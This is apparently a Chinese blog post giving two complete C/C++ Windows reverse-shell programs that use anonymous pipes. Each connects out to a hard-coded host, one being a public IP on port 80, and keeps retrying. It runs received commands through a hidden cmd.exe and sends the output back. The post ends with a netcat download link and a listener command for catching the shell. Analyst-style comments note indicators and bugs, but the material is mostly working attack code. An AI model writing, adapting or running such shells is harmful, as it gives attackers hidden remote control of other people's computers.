
C/C++ 匿名管道反弹CMDShell

微软技术分享
发布2022-12-28 13:42:43
#pragma comment(lib,"ws2_32.lib")
#ifdef _MSC_VER
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
#endif

#include <winsock2.h>
#include <windows.h>

/*
 * Reverse-connect command shell (sample 1).
 *
 * Behaviour as written: connect out to the hard-coded address/port below,
 * retrying forever; send a fixed banner; then loop: read one line of text
 * from the socket, run it through "<system dir>//cmd.exe /c<text>" with the
 * child's stdout/stderr redirected into an anonymous pipe, and write the
 * pipe contents back to the socket.
 *
 * Notes for an analyst reading this:
 *  - The remote endpoint and port are string/integer constants, so they are
 *    static indicators of this build.
 *  - The banner string and the fixed 5 s reconnect cadence are observable on
 *    the wire.
 *  - No return value of WSAStartup, socket, CreatePipe or CreateProcess is
 *    checked, and the per-command pipe read handle and process/thread
 *    handles are never closed (see comments below).
 */
int main(int argc, char **argv)
{
    char *messages = "======================== Connect successful !========================\n";
    WSADATA WSAData;
    SOCKET sock; // outbound TCP socket to the controlling host
    SOCKADDR_IN addr_in;
    char buf[1024]; // receive buffer for text arriving on the socket
    memset(buf, 0, 1024); // zeroed once here only; not cleared between commands

    WSAStartup(MAKEWORD(2, 2), &WSAData); // initialise Winsock 2.2 (result ignored)

    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(80); // remote port to connect back to
    addr_in.sin_addr.S_un.S_addr = inet_addr("59.110.167.239"); // remote address (hard-coded)

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    // Reconnect loop: keeps trying the same endpoint until a connection succeeds.
    while (WSAConnect(sock, (struct sockaddr *)&addr_in, sizeof(addr_in), NULL, NULL, NULL, NULL) == SOCKET_ERROR) // connect to the controlling host
    {
        Sleep(5000); // connection failed: pause 5 s, then retry
        continue;
    }

    send(sock, messages, strlen(messages), 0); // send the fixed "Connect successful" banner

    char buffer[2048] = { 0 };// data read back from the pipe

    // cmdline is uninitialised on the first pass; GetSystemDirectory below writes it
    // before it is read. Each later pass zeroes it via the for-increment.
    for (char cmdline[270];; memset(cmdline, 0, sizeof(cmdline))){
        SECURITY_ATTRIBUTES sa;// inheritable anonymous pipe used to capture cmd's output
        HANDLE hRead, hWrite;
        sa.nLength = sizeof(SECURITY_ATTRIBUTES);
        sa.lpSecurityDescriptor = NULL;
        sa.bInheritHandle = TRUE;

        CreatePipe(&hRead, &hWrite, &sa, 0); // create the pipe (result not checked)

        STARTUPINFO si;
        PROCESS_INFORMATION pi;
        si.cb = sizeof(STARTUPINFO);
        GetStartupInfo(&si); // fill in the STARTUPINFO structure
        si.hStdError = hWrite;   // child's stderr -> pipe
        si.hStdOutput = hWrite;  // child's stdout -> pipe
        si.wShowWindow = SW_HIDE; // hidden window
        si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

        GetSystemDirectory(cmdline, MAX_PATH + 1); // system directory path (buffer is 270 bytes, size passed is MAX_PATH + 1)
        strcat(cmdline, "//cmd.exe /c"); // path + "//cmd.exe /c" (note: no space follows "/c")

        // NULL is passed where recv() expects an int flags argument.
        int len = recv(sock, buf, 1024, NULL);
        if (len == SOCKET_ERROR) exit(0); // exit only on SOCKET_ERROR; a recv() of 0 (peer closed) is not handled here

        // Appends whatever is in buf, bounded by strlen(buf) rather than by len or by the
        // remaining space in cmdline; buf is not NUL-terminated by recv() and is never
        // re-zeroed, so a shorter command can carry the tail of an earlier longer one.
        strncat(cmdline, buf, strlen(buf)); // append received text to cmdline
        CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi); // spawn cmd.exe with inherited handles (result not checked)

        CloseHandle(hWrite); // drop our copy of the write end so ReadFile sees EOF when the child exits

        // Read the pipe until ReadFile fails (pipe broken once the child has exited and
        // closed its end), forwarding each chunk. The amount sent is strlen(buffer), not
        // bytesRead, so output containing a NUL byte is truncated at that byte.
        // hRead, pi.hProcess and pi.hThread are not closed on any path.
        for (DWORD bytesRead; ReadFile(hRead, buffer, 2048, &bytesRead, NULL); // loop reading pipe data and sending it until none remains
            memset(buffer, 0, 2048)){
            send(sock, buffer, strlen(buffer), 0);
        }
    }
    return 0;
}
#include <Windows.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32")

// Shared state for sample 2. The pipe handles are written by sendData() on the
// main thread and read by WatchData() on a worker thread with no synchronisation;
// they are zero-initialised, so WatchData() sees NULL until the first command runs.
HANDLE g_hinputPipe, g_houtputPipe; // g_hinputPipe = pipe write end (child's stdout/stderr), g_houtputPipe = read end
HANDLE g_hThread;                   // WatchData() worker thread
DWORD g_dwThreadId;
const unsigned short PORT = 4900;          // remote port (hard-coded)
const char * REMOTE_ADDR = "127.0.0.1";    // remote address (hard-coded)
const unsigned int MAXSTR = 255;           // size of cmdline/sockData buffers

//Run one received command line through cmd.exe with its output redirected into the pipe
/*
 * Build "<system dir>\cmd.exe /c <sockData>" in cmdline, create a fresh
 * inheritable anonymous pipe into the globals, spawn the command with a
 * hidden window and stdout/stderr redirected to the pipe, and wait up to
 * 10 s for it. The caller's sSock parameter is not used.
 *
 * Returns true on every path: the result of WaitForSingleObject is ignored
 * and CreatePipe/CreateProcess are retried forever rather than failing.
 *
 * Each call overwrites g_houtputPipe/g_hinputPipe and pi without closing the
 * previous pipe, process or thread handles.
 */
bool sendData(SOCKET sSock, char *cmdline, const char* sockData)
{
    ZeroMemory(cmdline, MAXSTR);
    SECURITY_ATTRIBUTES sa;
    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa.lpSecurityDescriptor = NULL;
    sa.bInheritHandle = TRUE; // pipe ends must be inheritable for the child to use them
    // Retry pipe creation once per second until it succeeds.
    while (!CreatePipe(&g_houtputPipe, &g_hinputPipe, &sa, 0))
    {
        Sleep(1000);
    }
    Sleep(200);
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    GetStartupInfo(&si);
    si.hStdError = g_hinputPipe;  // child's stderr -> pipe write end
    si.hStdOutput = g_hinputPipe; // child's stdout -> pipe write end
    si.wShowWindow = SW_HIDE;
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    GetSystemDirectory(cmdline, MAXSTR);
    strcat_s(cmdline, MAXSTR, "\\cmd.exe /c ");
    strcat_s(cmdline, MAXSTR, sockData); // sockData must be NUL-terminated within MAXSTR for this to be safe
    // Retry process creation once per second until it succeeds.
    while (!CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi))
    {
        Sleep(1000);
    }
    WaitForSingleObject(pi.hProcess, 10000); // wait at most 10 s; timeout vs. exit is not distinguished
    return true;
}

//Worker thread: watch the pipe's read end and relay anything that appears to the socket
/*
 * Thread body. lprarm carries the SOCKET (cast to LPVOID by the creator).
 * Polls g_houtputPipe with PeekNamedPipe; when data is pending it reads up
 * to 4096 bytes, appends "\r\nCMD >" and sends the result to the socket.
 *
 * The loop never exits (the `return 0` is unreachable). When no data is
 * pending, no Sleep is executed, so the thread spins on PeekNamedPipe.
 * The send length is strlen(readBuffer): a read that fills all 4096 bytes
 * leaves no terminator for strcat_s/strlen, and output containing a NUL
 * byte is truncated at that byte. The "\r\nCMD >" prompt is a fixed
 * on-the-wire marker of this sample.
 */
DWORD WINAPI WatchData(LPVOID lprarm)
{
    unsigned int g_Ret = 0;    // local despite the g_ prefix
    DWORD dwTotalAvail = 0;
    DWORD realReadLen = 0;
    char readBuffer[4096] = "\0";
    SOCKET sSock = (SOCKET)lprarm;
    while (true)
    {
        // g_houtputPipe is NULL until the first sendData() call; PeekNamedPipe then fails.
        g_Ret = PeekNamedPipe(g_houtputPipe, NULL, 0, NULL, &dwTotalAvail, NULL);
        if (g_Ret && dwTotalAvail > 0)
        {
            Sleep(300);
            g_Ret = ReadFile(g_houtputPipe, readBuffer, 4096, &realReadLen, NULL);
            if (g_Ret && realReadLen > 0)
            {
                Sleep(200);
                strcat_s(readBuffer, 4096, "\r\nCMD >"); // append prompt marker
                send(sSock, readBuffer, strlen(readBuffer), 0);
                ZeroMemory(readBuffer, 4096);
            }
        }
    }
    return 0;
}

//Entry point
/*
 * Reverse-connect command shell (sample 2), GUI-subsystem entry point so no
 * console is shown. Connects out to REMOTE_ADDR:PORT, retrying every 2 s,
 * starts the WatchData() relay thread, then loops forever receiving text
 * from the socket and handing it to sendData().
 *
 * Notes for an analyst reading this:
 *  - recv() is given MAXSTR bytes of a MAXSTR-byte buffer, so a full-size
 *    read leaves sockData without a NUL terminator; sockDataLen is not used
 *    to terminate it.
 *  - recv() returning 0 (peer closed) is not SOCKET_ERROR, so the loop
 *    continues and runs an empty command.
 *  - sendData() always returns true, so the "[*] Send Error !" branch is
 *    never taken, and the `while (true)` has no break, so everything after
 *    it (cleanup, WSACleanup, ExitProcess) is unreachable.
 */
int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd)
{
    char sendError[30] = "[*] Send Error !\r\n\r\n";
    char cmdline[MAXSTR] = "\0";   // command line assembled by sendData()
    char sockData[MAXSTR] = "\0";  // text received from the socket
    int sockDataLen = 0;
    SOCKET sSock;
    sockaddr_in sockAddr;
    WSADATA wsd;
    if (WSAStartup(MAKEWORD(2, 2), &wsd)) return 0;
    if ((sSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return 0;
    sockAddr.sin_addr.S_un.S_addr = inet_addr(REMOTE_ADDR);
    sockAddr.sin_family = AF_INET;
    sockAddr.sin_port = htons(PORT);
    // Reconnect loop with a fixed 2 s cadence.
    while (connect(sSock, (sockaddr*)&sockAddr, sizeof(sockAddr)) == SOCKET_ERROR)
    {
        Sleep(2000);
        continue;
    }

    // Relay thread reads the pipe and writes to the socket; this thread reads the socket.
    g_hThread = CreateThread(NULL, 0, WatchData, LPVOID(sSock), 0, &g_dwThreadId);
    while (true)
    {
        // Retry recv() once per second on SOCKET_ERROR; a 0 return falls through.
        while ((sockDataLen = recv(sSock, sockData, MAXSTR, 0)) == SOCKET_ERROR)
        {
            Sleep(1000);
        }
        if (!sendData(sSock, cmdline, sockData)) // never true as sendData() is written
        {
            send(sSock, sendError, strlen(sendError), 0);
        }
        ZeroMemory(sockData, MAXSTR);
    }

    // Unreachable: the loop above never exits.
    WaitForSingleObject(g_hThread, INFINITE);
    CloseHandle(g_hinputPipe);
    CloseHandle(g_houtputPipe);
    closesocket(sSock);
    WSACleanup();
    ExitProcess(0);
    return 0;
}

下载NC https://eternallybored.org/misc/netcat/

nc执行命令:nc命令 : -l -v -p [端口] 等待上线
